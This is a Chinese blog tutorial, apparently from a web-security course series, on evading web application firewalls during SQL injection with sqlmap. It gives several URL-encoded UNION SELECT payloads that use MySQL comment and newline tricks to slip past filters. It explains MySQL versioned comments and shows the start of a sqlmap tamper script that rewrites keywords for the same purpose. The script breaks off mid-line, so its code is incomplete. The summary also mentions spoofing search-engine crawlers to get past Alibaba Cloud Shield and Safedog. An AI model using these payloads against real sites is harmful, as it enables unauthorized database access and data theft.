第19天-WEB漏洞-SQL注入之SQLMAP绕过WAF

本文介绍了在网络安全中如何针对服务器、数据库、应用层和WAF层构造Payload以对抗和绕过安全防御。讨论了数据库特性和FUZZ绕过脚本,并提供了伪装百度爬虫的示例,同时分享了如何通过修改User-Agent、IP白名单、静态资源请求和URL白名单等方式绕过WAF。此外,还提及了阿里云盾和安全狗的SQL注入防护策略及其规避方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在攻防实战中,往往需要掌握一些特性,比如服务器、数据库、应用层、WAF 层等,以便我们更灵活地去构造 Payload,从而可以和各种WAF 进行对抗,甚至绕过安全防御措施进行漏洞利用。

在这里插入图片描述

数据库特性(补充)

%23x%0aunion%23x%0Aselect%201,2,3

%20/!44509union/%23x%0aselect%201,2,3

id=1/**&id=-1%20union%20select%201,2,3%23*/

%20union%20all%23%0a%20select%201,2,3%23

/*!50001 select * from test /;
这里的 !50001表示假如数据库是5.00.01以上版本,select * from test 语句才会被推行
因此固然你的mysqldump出来的成立view的语句在解释里,实际.上它是会被推行的
假如是一下内容,就不会推行了,那是真正的解释了
/
select * from test */;

在这里插入图片描述

FUZZ绕过脚本

`#!/usr/bin/envpython

"""
Copyright(c)2006-2019sqlmapdevelopers(http://sqlmap.org/)
Seethefile'LICENSE'forcopyingpermission
"""

import os

from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY

__priority__=PRIORITY.HIGHEST

def dependencies():
	singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s"%(os.path.basename(__file__).split(".")[0],DBMS.MYSQL))

def tamper(payload,**kwargs):
    
#%23a%0aunion/*!44575select*/1,2,3
	if payload:
        payload=payload.replace("union","%23a%0aunion")
        payload=payload.replace("select",
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值